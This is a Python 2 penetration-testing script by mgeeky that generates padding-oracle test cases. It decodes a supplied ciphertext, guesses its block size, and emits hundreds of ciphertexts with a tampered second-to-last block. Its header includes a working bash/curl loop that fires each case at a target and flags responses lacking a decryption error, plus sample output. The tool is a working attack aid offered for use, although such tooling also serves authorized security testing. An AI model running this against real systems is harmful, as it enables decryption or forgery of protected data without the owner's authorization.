#!/usr/bin/python # # Padding Oracle test-cases generator. # Mariusz B. / mgeeky, 2016 # v0.2 # # Simple utility that aids the penetration tester when manually testing Padding Oracle condition # of a target cryptosystem, by generating set of test cases to fed the cryptosystem with. # # Script that takes from input an encoded cipher text, tries to detect applied encoding, decodes the cipher # and then generates all the possible, reasonable cipher text transformations to be used while manually # testing for Padding Oracle condition of cryptosystem. The output of this script will be hundreds of # encoded values to be used in manual application testing approaches, like sending requests. # # One of possible scenarios and ways to use the below script could be the following: # - clone the following repo: https://github.com/GDSSecurity/PaddingOracleDemos # - launch pador.py which is an example of application vulnerable to Padding Oracle # - then by using `curl http://localhost:5000/echo?cipher=` we are going to manually # test for Padding Oracle outcomes. The case of returning something not being a 'decryption error' # result would be considered padding-hit, therefore vulnerability proof. # # This script could be then launched to generate every possible test case of second to the last block # being filled with specially tailored values (like vector of zeros with last byte ranging from 0-255) # and then used in some kind of local http proxy (burp/zap) or http client like (curl/wget). # # Such example usage look like: # #--------------------------------------------- # bash$ x=0 ; for i in $(./padding-oracle-tests.py 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6); \ # do curl -s http://host:5000/echo?cipher=$i | grep -qv 'error' && printf "Byte: 0x%02x not generated decryption error.\n" $x ; x=$((x+1)); done # # [?] Data resembles block cipher with block size = 16 # [?] Data resembles block cipher with block size = 8 # # Generated in total: 512 test cases for 8, 16 block sizes. # Byte: 0x87 not generated decryption error. #--------------------------------------------- # # There the script took at it's first parameter the hex encoded parameter, used it to feed test cases generator and resulted with 512 # test cases varying with the last byte of the second to the last block: # (...) # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fad2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fbd2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fcd2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fdd2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fed2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000ffd2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000054bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000154bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000254bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000354bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000454bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000554bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000654bfebe0a04dd4d6 # (...) # # At the end, those values were used in for loop to launch for every entry a curl client with request to the Padding Oracle. # The 0x87 byte that was catched was the only one that has not generated a 'decryption error' outcome from the request, resulting # in improperly decrypted plain-text from attacker-controled cipher text. # import re import sys import urllib import binascii as ba import base64 # Flip this variable when your input data is not being properly processed. DEBUG = False def info(txt): sys.stderr.write(txt + '\n') def warning(txt): info('[?] ' + txt) def error(txt): info('[!] ' + txt) def dbg(txt): if DEBUG: info('[dbg] '+txt) # or maybe: # class PaddingOracleTestCasesWithVaryingSecondToTheLastBlockGenerator class PaddingOracleTestCasesGenerator: NONE = 0 B64URL = 1 B64STD = 2 HEXENC = 3 data = '' offset = 0 encoding = NONE blocksizes = set() urlencoded = False def __init__(self, data, blocksize=0): self.data = data len_before = len(data) self.encoding = self.detect_encoding() self.data = self.decode(data) if blocksize != 0: assert blocksize % 8 == 0, "Blocksize must be divisible by 8" self.blocksizes = [blocksize,] else: self.detect_blocksize() self.data_evaluation(len_before) def data_evaluation(self, len_before): def entropy(txt): import math from collections import Counter p, lns = Counter(txt), float(len(txt)) return -sum( count / lns * math.log(count/lns, 2) for count in p.values()) e = entropy(self.data) warning('Data size before and after decoding: %d -> %d' % (len_before, len(self.data))) warning('Data entropy: %.6f' % entropy(self.data)) if e < 5.0: info('\tData does not look random, not likely to deal with block cipher.') elif e >= 5.0 and e < 7.0: info('\tData only resembles random stream, hardly to be dealing with block cipher.') else: info('\tHigh likelihood of dealing with block cipher. That\'s good.') if self.offset != 0: warning('Data structure not resembles block cipher.') warning('Proceeding with sliding window of %d bytes in the beginning and at the end\n' % self.offset) else: warning('Data resembles block cipher with block size = %d' % max(self.blocksizes)) def detect_encoding(self): b64url = '^[a-zA-Z0-9_\-]+={0,2}$' b64std = '^[a-zA-Z0-9\+\/]+={0,2}$' hexenc1 = '^[0-9a-f]+$' hexenc2 = '^[0-9A-F]+$' data = self.data if re.search('%[0-9a-f]{2}', self.data, re.I) != None: dbg('Sample is url-encoded.') data = urllib.unquote_plus(data) self.urlencoded = True if (re.match(hexenc1, data) or re.match(hexenc2, data)) and len(data) % 2 == 0: dbg('Hex encoding detected.') return self.HEXENC if re.match(b64url, data): dbg('Base64url encoding detected.') return self.B64URL if re.match(b64std, data): dbg('Standard Base64 encoding detected.') return self.B64STD error('Warning: Could not detect data encoding. Going with plain data.') return self.NONE def detect_blocksize(self): sizes = [32, 16, 8] # Correspondigly: 256, 128, 64 bits self.offset = len(self.data) % 8 datalen = len(self.data) - self.offset for s in sizes: if datalen % s == 0 and datalen / s >= 2: self.blocksizes.add(s) if not len(self.blocksizes): if datalen >= 32: self.blocksizes.add(16) if datalen >= 16: self.blocksizes.add(8) if not len(self.blocksizes): raise Exception("Could not detect data's blocksize automatically.") def encode(self, data): def _enc(data): if self.encoding == PaddingOracleTestCasesGenerator.B64URL: return base64.urlsafe_b64encode(data) elif self.encoding == PaddingOracleTestCasesGenerator.B64STD: return base64.b64encode(data) elif self.encoding == PaddingOracleTestCasesGenerator.HEXENC: return ba.hexlify(data).strip() else: return data enc = _enc(data) if self.urlencoded: return urllib.quote_plus(enc) else: return enc def decode(self, data): def _decode(self, data): if self.urlencoded: data = urllib.unquote_plus(data) if self.encoding == PaddingOracleTestCasesGenerator.B64URL: return base64.urlsafe_b64decode(data) elif self.encoding == PaddingOracleTestCasesGenerator.B64STD: return base64.b64decode(data) elif self.encoding == PaddingOracleTestCasesGenerator.HEXENC: return ba.unhexlify(data).strip() else: return data dbg("Hex dump of data before decoding:\n" + hex_dump(data)) decoded = _decode(self, data) dbg("Hex dump of data after decoding:\n" + hex_dump(decoded)) return decoded def construct_second_to_last_block(self, data, blocksize, value, offset=0): assert len(data) >= 2 * blocksize, "Too short data to operate on it with given blocksize." assert abs(offset) < blocksize, "Incorrect offset was specified. Out-of-bounds access." # Null vector with the last byte set to iterated value. block = '0' * (2*(blocksize-1)) + '%02x' % value if offset >= 0: # datadata return data[:-2*blocksize-offset] + ba.unhexlify(block) + data[-blocksize-offset:] else: # datadata return data[-offset:-2*blocksize] + ba.unhexlify(block) + data[-blocksize:] def generate_test_cases(self): cases = [] data = self.data for size in self.blocksizes: dbg("Now generating test cases of %d blocksize." % size) for byte in range(256): # No offset cases.append(self.encode(self.construct_second_to_last_block(data, size, byte))) if self.offset != 0: cases.append(self.encode(self.construct_second_to_last_block(data, size, byte, self.offset))) cases.append(self.encode(self.construct_second_to_last_block(data, size, byte, -self.offset))) return cases def hex_dump(data): s = '' n = 0 lines = [] if len(data) == 0: return '' for i in range(0, len(data), 16): line = '' line += '%04x | ' % (i) n += 16 for j in range(n-16, n): if j >= len(data): break line += '%02x ' % ord(data[j]) line += ' ' * (3 * 16 + 7 - len(line)) + ' | ' for j in range(n-16, n): if j >= len(data): break c = data[j] if not (ord(data[j]) < 0x20 or ord(data[j]) > 0x7e) else '.' line += '%c' % c lines.append(line) return '\n'.join(lines) def main(): info('\n\tPadding Oracle test-cases generator') info('\tMariusz B. / mgeeky, 2016\n') if len(sys.argv) < 2: warning('usage: padding-oracle-tests.py [blocksize]') sys.exit(0) data = sys.argv[1].strip() bsize = int(sys.argv[2]) if len(sys.argv) > 2 else 0 try: tester = PaddingOracleTestCasesGenerator(data, bsize) except Exception as e: error(str(e)) return False s = hex_dump(tester.data) info('Decoded data:\n%s\n' % s) cases = tester.generate_test_cases() for case in cases: if DEBUG: dbg('...' + case[-48:]) else: print case info('\n[+] Generated in total: %d test cases for %s block sizes.' \ % (len(cases), ', '.join([str(e) for e in sorted(tester.blocksizes)]))) if __name__ == '__main__': main()